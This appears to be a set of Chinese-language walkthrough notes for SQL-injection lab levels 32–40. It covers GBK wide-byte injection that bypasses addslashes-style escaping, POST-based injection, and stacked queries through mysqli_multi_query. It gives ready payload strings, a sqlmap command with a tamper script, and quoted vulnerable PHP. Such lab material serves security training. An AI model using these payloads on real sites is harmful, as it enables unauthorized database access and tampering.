32

步骤

手动

宽字节注入原理:php中编码为gbk，函数执行添加的是ascii编码，当mysql使用gbk的时候，%df会与\组成%df%5c为一个宽字符。

payload:?id=0%df%27%20union%20select%201,2,3--+

sqlmap

python sqlmap.py -r temp.txt --tamper unmagicquotes.py --batch --dbms mysql

33

同32，看源码32是自己编写addslash函数，33是php自带的addslashes()

34

步骤

手动

改成post即可

payload:uname=admin%df' union select version(),database()--+&passwd=admin&submit=Submit

35

步骤

手动

payload:?id=-1%20union%20select%201,2,3

36

同32

过滤函数:

function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}

37

36改成post

38

步骤

手动

if (mysqli_multi_query($con1, $sql))
{

/* store first result set */
if ($result = mysqli_store_result($con1))
{
if($row = mysqli_fetch_row($result))
{
echo '<font size = "5" color= "#00FF00">';
printf("Your Username is : %s", $row[1]);
echo "<br>";
printf("Your Password is : %s", $row[2]);
echo "<br>";
echo "</font>";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
//printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
/* close connection */
mysqli_close($con1);

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

payload:?id=1%27;%20create%20table%20test38%20like%20users;%20--+

39

同上数字型注入

40

payload:http://localhost/Less-40/?id=1%27);create%20table%20test40%20like%20users;--+